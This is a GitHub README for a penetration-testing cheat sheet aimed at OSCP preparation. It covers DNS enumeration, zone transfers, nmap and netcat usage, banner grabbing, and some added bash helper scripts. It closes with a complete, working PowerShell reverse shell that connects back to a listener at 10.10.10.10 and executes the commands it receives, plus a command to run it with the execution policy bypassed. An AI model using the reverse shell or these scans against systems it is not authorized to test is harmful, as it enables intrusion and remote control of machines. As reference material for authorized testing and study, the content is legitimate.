54N4L/Pentest-Cheat-Sheets

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

99 Commits
 
 
 
 
 
 

Repository files navigation

Pentest Cheat Sheets

Pentest-Cheat-Sheets

This repo is a collection of code snippets and commands to make our lives easier. The purpose is not to be a crutch but to avoid wasting precious time. It also helps anyone preparing for the OSCP: you'll find many ways to do things without the Metasploit Framework.

Ninja Tricks

Recon

DNS

Nslookup

Resolve a given hostname to the corresponding IP.

nslookup targetorganization.com

Reverse DNS lookup (PTR record for an IP)

nslookup -type=PTR IP_address

MX (Mail Exchange) lookup

nslookup -type=MX domain

Zone Transfer

Using the nslookup command (interactive mode): point it at one of the domain's authoritative nameservers, then request the whole zone. The ls subcommand only exists in the Windows nslookup; the BIND nslookup on Linux answers "not implemented", so use the host command below there.

nslookup
server ns1.domain.com
ls -d domain.com
Using the host command

List the domain's nameservers (-t ns = query NS records):

host -t ns domain.com

Then test each nameserver in turn; -l asks the given server for a full zone transfer (AXFR), which a misconfigured server will happily return:

host -l domain.com ns2.domain.com
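The two host commands above are one procedure: list the nameservers, then try every one of them for AXFR. The script below is an added example (not code from the Pentest-Cheat-Sheets repo) that automates it and classifies each answer, so a refused transfer is not mistaken for an empty zone. It assumes the host binary from bind9-dnsutils; domain.com and the ns1/ns2 names are placeholders.

```bash
#!/usr/bin/env bash
# Added example (not from the repo): enumerate a domain's nameservers with
# `host -t ns`, then attempt a zone transfer (AXFR) against each one with
# `host -l`, reporting per server whether it was refused or how many
# records came back. Requires `host` (bind9-dnsutils); domain names in the
# usage line are placeholders.

# Read `host -t ns <domain>` output on stdin and print bare NS hostnames,
# one per line, with the trailing dot removed.
extract_ns() {
    awk '/name server/ { sub(/\.$/, "", $NF); print $NF }'
}

# Read `host -l <domain> <ns>` output on stdin. Print "refused" when the
# server denied the transfer (host prints "; Transfer failed."), otherwise
# print "ok" followed by the number of resource records it returned.
classify_axfr() {
    awk '
        /Transfer failed/ { refused = 1 }
        /has address|has IPv6 address|name server|is an alias/ { n++ }
        END { if (refused) print "refused"; else print "ok", n + 0 }
    '
}

# Try AXFR on every authoritative nameserver of $1 and print one
# tab-separated line per server: domain, nameserver, result.
axfr_all() {
    local domain=$1 ns result
    host -t ns "$domain" | extract_ns | while read -r ns; do
        result=$(host -l "$domain" "$ns" 2>&1 | classify_axfr)
        printf '%s\t%s\t%s\n' "$domain" "$ns" "$result"
    done
}

# Usage (network access and authorization required):
#   axfr_all domain.com
```

Only run axfr_all against domains you are authorized to assess; most nameservers refuse AXFR, and the refused line is itself a useful finding because it confirms the server name resolved and answered.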
Nmap DNS Enumeration

Fast scan of a range while resolving the hosts through a specific DNS server, useful when the target's own resolver knows internal hostnames that yours does not:

nmap -F --dns-servers <dns server ip> <target ip range>

Auto tools

DNSenum

dnsenum targetdomain.com

Brute force subdomains from the wordlist dns.txt, write the valid ones to target_domain_subs.txt (--subfile), add every hit back into the wordlist (-u a) and recurse into the subdomains found (-r):

dnsenum --subfile target_domain_subs.txt -v -f dns.txt -u a -r targetdomain.com

DNSmap

dnsmap targetdomain.com -w <wordlist file.txt>

Brute force with the built-in wordlist; -r names the results file, and when it is given a directory such as /tmp/ dnsmap creates the file inside it:

dnsmap targetdomain.com -r /tmp/

DNSRecon DNS Brute Force

-t brt brute forces names from the -D wordlist (-t std would only run the standard SOA/NS/MX/A checks and ignore the wordlist):

dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t brt --xml output.xml

Fierce.pl

fierce -dns targetdomain.com

The Python rewrite of fierce shipped in current Kali takes --domain targetdomain.com instead.

HostMap

hostmap.rb -only-passive -t <IP>

Add -with-zonetransfer to also attempt zone transfers, or -bruteforce-level to brute force names.

Online Tools

Nmap

Set the target as variables first, so the commands below can be pasted as-is:

export ip=192.168.1.100
export netw=192.168.1.0/24

Detecting Live Hosts

Only IPs (ping sweep; -n disables DNS resolution so that the fifth field of each "Nmap scan report for" line is the address rather than a hostname):

nmap -sn -n $netw | grep for | cut -d" " -f5
Stealth Scan (SYN scan, needs root)

nmap -sS $ip

Only open ports and banner grab (no ping, no DNS, -sV service/version detection)

nmap -n -Pn -sS $ip --open -sV

Stealth scan using a FIN scan

nmap -sF $ip

Aggressive scan

No ping, no DNS resolution, show only open ports, test all 65535 TCP ports (-p-) and run -A (OS detection, version detection, default scripts, traceroute):

nmap -n -Pn -sS -A $ip --open -p-

Nmap verbose scan: SYN stealth scan, T4 timing, OS and service version info, traceroute and scripts against services

nmap -v -sS -A -T4 $ip

OS Fingerprint

nmap -O $ip

Quick Scan

nmap -T4 -F $netw

Quick Scan Plus

nmap -sV -T4 -O -F --version-light $netw

Output to a file (-oN, normal format)

nmap -oN nameFile -p 1-65535 -sV -sS -A -T4 $ip

Output to a file Plus (-oA writes all three formats at once: nameFile.nmap, nameFile.gnmap and nameFile.xml)

nmap -oA nameFile -p 1-65535 -sV -sS -A -T4 $netw
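The grep/cut pipeline under "Detecting Live Hosts" breaks as soon as a hostname appears in the report line; nmap's greppable output (-oG, the .gnmap file that -oA writes) is built for exactly this kind of parsing. Below is an added example (not code from the Pentest-Cheat-Sheets repo) that chains the ping sweep, a SYN plus version scan of only the live hosts, and a parser for the open ports and banners in the .gnmap file. It assumes nmap is installed and $netw is set as above; the file names live.txt and scan.* are the example's own.

```bash
#!/usr/bin/env bash
# Added example (not from the repo): parse nmap greppable output (-oG / .gnmap)
# instead of the human-readable report, and chain a ping sweep into a port
# scan of only the hosts that answered. Assumes nmap is installed; file names
# (live.txt, scan.*) are the example's own choice.

# Read greppable output on stdin; print the IP of every host reported Up.
# Greppable host lines look like: "Host: 10.0.0.5 ()<TAB>Status: Up"
up_hosts() {
    awk '/Status: Up/ { print $2 }'
}

# Read greppable output on stdin; print "ip port proto service [version]"
# for every port in state "open". The Ports field is a comma-separated list
# of "port/state/proto//service//version/" entries; filtered and closed
# ports are skipped.
open_ports() {
    awk -F'\t' '
        /\tPorts: / {
            split($1, h, " "); ip = h[2]
            for (i = 2; i <= NF; i++) if ($i ~ /^Ports: /) ports = substr($i, 8)
            n = split(ports, entry, ", ")
            for (j = 1; j <= n; j++) {
                split(entry[j], f, "/")
                if (f[2] != "open") continue
                line = ip " " f[1] " " f[3] " " f[5]
                if (f[7] != "") line = line " " f[7]
                print line
            }
        }'
}

# Sweep the network, then run a SYN + version scan only against live hosts,
# saving all three formats as scan.nmap/scan.gnmap/scan.xml; the .gnmap
# file is then reduced to one line per open port.
scan_live() {
    local netw=$1
    nmap -sn -n -oG - "$netw" | up_hosts > live.txt
    nmap -n -Pn -sS -sV --open -iL live.txt -oA scan
    open_ports < scan.gnmap
}

# Usage (root and network access required):
#   scan_live 192.168.1.0/24
```

Keeping the .gnmap file around pays off later: open_ports can be re-run against it at any time, and the same one-line-per-port form feeds straight into further tooling or a findings table.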

Search Nmap scripts (by name, e.g. everything related to ftp)

ls /usr/share/nmap/scripts/ | grep ftp

NetCat

Port Scanner (-z only checks whether the port accepts a connection, -n skips DNS, -v reports the result)

One port

nc -nvz 192.168.1.23 80

Port Range

nc -vnz 192.168.1.23 1-1000
Send files
  • Server
nc -lvp 1234 > file_name_to_save
  • Client
nc -vn 192.168.1.33 1234 < file_to_send
Executing remote script (the script runs on the server with the connection as its stdin/stdout; -e needs a netcat built with that option, e.g. netcat-traditional or ncat, and takes a single program path, so put any arguments inside the script or use ncat -c 'ping.sh <IP>' to run it through /bin/sh)
  • Server
nc -lvp 1234 -e /path/to/ping.sh
  • Client
nc -vn 192.168.1.33 1234
Chat with encryption (ncat; both ends must pass --ssl or the TLS handshake fails)
  • Server
ncat -nlvp 8000 --ssl
  • Client
ncat -nv --ssl 192.168.1.33 8000
Banner Grabbing

Connect with nc and type the request by hand: the verb, path and protocol version on the first line, a Host header, then an empty line to end the request.

nc target port
HTTP_Verb path http/version
Host: url

nc www.bla.com.br 80
HEAD / HTTP/1.0
Host: www.bla.com.br

If the site uses HTTPS you need openssl instead of nc (then type the same request):

openssl s_client -quiet -connect www.bla.com.br:443
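The banner grab above is the same request over two transports. The script below is an added example (not code from the Pentest-Cheat-Sheets repo) that builds the HEAD request once with proper CRLF line endings and the terminating blank line, sends it through nc for plain HTTP or through openssl s_client for HTTPS, and pulls the Server header out of whatever comes back. It assumes nc and openssl are installed; www.bla.com.br and www.example.com are placeholders.

```bash
#!/usr/bin/env bash
# Added example (not from the repo): scripted HTTP banner grabbing over nc
# (plain HTTP) or openssl s_client (HTTPS), plus a parser for the Server
# header. Assumes nc and openssl are installed; host names are placeholders.

# Build a minimal HTTP/1.0 HEAD request. HTTP wants CRLF line endings and an
# empty line after the headers; without that blank line the server keeps
# waiting for more headers and nothing comes back.
http_head_request() {
    printf 'HEAD / HTTP/1.0\r\nHost: %s\r\n\r\n' "$1"
}

# Read a raw HTTP response on stdin and print the value of the Server header
# (header names are case-insensitive), or "unknown" if there is none.
server_header() {
    tr -d '\r' | awk '
        tolower($1) == "server:" { sub(/^[^:]*:[ \t]*/, ""); found = 1; print; exit }
        END { if (!found) print "unknown" }'
}

# Send the request to host $1 on port $2. Port 443, or any port written as
# "ssl:<port>", goes through TLS with SNI set to the host name; -quiet keeps
# the certificate chatter out of the output and waits for the server to close.
grab_banner() {
    local host=$1 port=$2
    case $port in
        443|ssl:*)
            port=${port#ssl:}
            http_head_request "$host" | openssl s_client -quiet -servername "$host" -connect "$host:$port" 2>/dev/null ;;
        *)
            http_head_request "$host" | nc -v "$host" "$port" ;;
    esac
}

# Usage (network access required):
#   grab_banner www.bla.com.br 80  | server_header
#   grab_banner www.bla.com.br 443 | server_header
```

HEAD with HTTP/1.0 is deliberate: the server closes the connection after its response, so nc and s_client both exit on their own instead of hanging on an open keep-alive connection.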

Reverse Shell

PowerShell Reverse

Create a simple PowerShell script called reverse.ps1. It connects back to 10.10.10.10 on port 80, so a listener (for example nc -lvp 80) must already be waiting there; change the address and port to your own:

# Connects to the listener, reads commands, runs them with iex and sends the output back with a "PS path> " prompt
function reverse_powershell {
    $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
}

Then load the script from the directory it is in and call the function, bypassing the execution policy:

powershell -ExecutionPolicy bypass -command "Import-Module .\reverse.ps1; reverse_powershell"

Resources

Contribution

HOW TO
